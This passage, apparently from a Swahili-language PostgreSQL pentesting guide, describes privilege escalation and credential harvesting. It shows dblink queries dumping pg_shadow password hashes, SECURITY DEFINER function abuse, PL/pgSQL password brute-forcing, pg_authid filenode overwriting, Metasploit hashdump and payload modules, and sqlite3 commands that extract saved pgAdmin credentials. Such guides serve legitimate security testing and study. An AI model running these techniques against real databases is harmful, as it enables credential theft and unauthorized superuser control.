mtumiaji huyo hauruhusiwi kuingia kutoka anwani ya IP ya nje unaweza kutumia kazi ifuatayo kutekeleza maswali kama mtumiaji huyo: ```sql SELECT * FROM dblink('host=127.0.0.1 user=someuser dbname=somedb', 'SELECT usename,passwd from pg_shadow') RETURNS (result TEXT); ``` Inawezekana kuthibitisha ikiwa kazi hii ipo kwa: ```sql SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2; ``` ### **Kazi iliyobuniwa kwa kazi maalum** na SECURITY DEFINER [**Katika andiko hili**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), wapimaji walikuwa na uwezo wa privesc ndani ya kipengele cha postgres kilichotolewa na IBM, kwa sababu waligundua **kazi hii yenye bendera ya SECURITY DEFINER**:
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
    VOLATILE SECURITY DEFINER
    PARALLEL UNSAFE
COST 100

AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…
Kama [**inavyoelezwa katika nyaraka**](https://www.postgresql.org/docs/current/sql-createfunction.html) kazi yenye **SECURITY DEFINER inatekelezwa** na mamlaka ya **mtumiaji anayemiliki**. Kwa hivyo, ikiwa kazi hiyo ina **udhaifu wa Kuingiza SQL** au inafanya **vitendo vya haki na vigezo vinavyodhibitiwa na mshambuliaji**, inaweza kutumiwa kwa **kuinua mamlaka ndani ya postgres**. Katika mstari wa 4 wa msimbo uliopita unaweza kuona kuwa kazi ina bendera ya **SECURITY DEFINER**. ```sql CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user); ``` Na kisha **tekeleza amri**:
### Pita Burteforce na PL/pgSQL **PL/pgSQL** ni **lugha kamili ya programu** inayotoa udhibiti wa taratibu zaidi ikilinganishwa na SQL. Inawezesha matumizi ya **mizunguko** na **miundo mingine ya udhibiti** kuboresha mantiki ya programu. Aidha, **maagizo ya SQL** na **triggers** ina uwezo wa kuita kazi zilizoundwa kwa kutumia **lugha ya PL/pgSQL**. Ushirikiano huu unaruhusu njia kamili na yenye uwezo zaidi ya programu za database na uendeshaji wa moja kwa moja.\ **Unaweza kutumia lugha hii kwa njia mbaya ili kuomba PostgreSQL kuvunja nguvu za watumiaji.** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %} [pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md) {% endcontent-ref %} ### Privesc kwa Kuchukua Nafasi ya Vitabu vya Ndani vya PostgreSQL {% hint style="info" %} Mwelekeo wa privesc ufuatao ni muhimu sana katika muktadha wa SQLi uliopunguzwa, kwani hatua zote zinaweza kutekelezwa kupitia maagizo ya SELECT yaliyofungwa {% endhint %} Ikiwa unaweza **kusoma na kuandika faili za seva za PostgreSQL**, unaweza **kuwa superuser** kwa kuchukua nafasi ya filenode ya diski ya PostgreSQL, inayohusishwa na jedwali la ndani la `pg_authid`. Soma zaidi kuhusu **mbinu hii** [**hapa**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**.** Hatua za shambulio ni: 1. Pata saraka ya data ya PostgreSQL 2. Pata njia ya kihesabu kwa filenode, inayohusishwa na jedwali la `pg_authid` 3. Pakua filenode kupitia kazi za `lo_*` 4. Pata aina ya data, inayohusishwa na jedwali la `pg_authid` 5. Tumia [Mhariri wa Filenode wa PostgreSQL](https://github.com/adeadfed/postgresql-filenode-editor) kuhariri filenode; weka alama zote za boolean za `rol*` kuwa 1 kwa ruhusa kamili. 6. Pakia upya filenode iliyohaririwa kupitia kazi za `lo_*`, na kuchukua nafasi ya faili ya asili kwenye diski 7. _(Hiari)_ Futa cache ya jedwali la kumbukumbu kwa kukimbia swali la SQL lenye gharama kubwa 8. Sasa unapaswa kuwa na mamlaka ya superadmin kamili. ## **POST** ``` msf> use auxiliary/scanner/postgres/postgres_hashdump msf> use auxiliary/scanner/postgres/postgres_schemadump msf> use auxiliary/admin/postgres/postgres_readfile msf> use exploit/linux/postgres/postgres_payload msf> use exploit/windows/postgres/postgres_payload ``` ### kuingiza Ndani ya faili ya _**postgresql.conf**_ unaweza kuwezesha kuingiza kwa postgresql kwa kubadilisha: ```bash log_statement = 'all' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' logging_collector = on sudo service postgresql restart #Find the logs in /var/lib/postgresql//main/log/ #or in /var/lib/postgresql//main/pg_log/ ``` Kisha, **anzisha upya huduma**. ### pgadmin [pgadmin](https://www.pgadmin.org) ni jukwaa la utawala na maendeleo kwa PostgreSQL.\ Unaweza kupata **maneno ya siri** ndani ya faili ya _**pgadmin4.db**_\ Unaweza kuyadakua kwa kutumia kazi ya _**decrypt**_ ndani ya script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py) ```bash sqlite3 pgadmin4.db ".schema" sqlite3 pgadmin4.db "select * from user;" sqlite3 pgadmin4.db "select * from server;" string pgadmin4.db ``` ### pg\_hba Uthibitisho wa mteja katika PostgreSQL unadhibitiwa kupitia faili ya usanidi inayoitwa **pg\_hba.conf**. Faili hii ina rekodi za mfululizo, kila moja ikieleza aina ya uhusiano, mbalimbali za anwani ya IP ya mteja (ikiwa inafaa), jina la database, jina la mtumiaji, na njia ya uthibitisho inayotumika kwa uhusiano unaolingana. Rekodi ya kwanza inayolingana na aina ya uhusiano, anwani ya IP ya mteja, database inayotakiwa, na jina la mtumiaji hutumiwa kwa uthibitisho. Hakuna njia mbadala au urejeshaji ikiwa uthibitisho unashindwa. Ikiwa hakuna rekodi inayolingana, ufikiaji unakataliwa. Njia za uthibitisho kwa msingi wa nywila katika pg\_hba.conf ni **md5**, **crypt**, na **password**. Njia hizi zinatofautiana katika jinsi nywila inavyotumwa: MD5-hashed, crypt-encrypted, au maandishi wazi. Ni muhimu kutambua kuwa njia ya crypt haiwezi kutumika na nywila zilizoandikwa katika pg\_authid.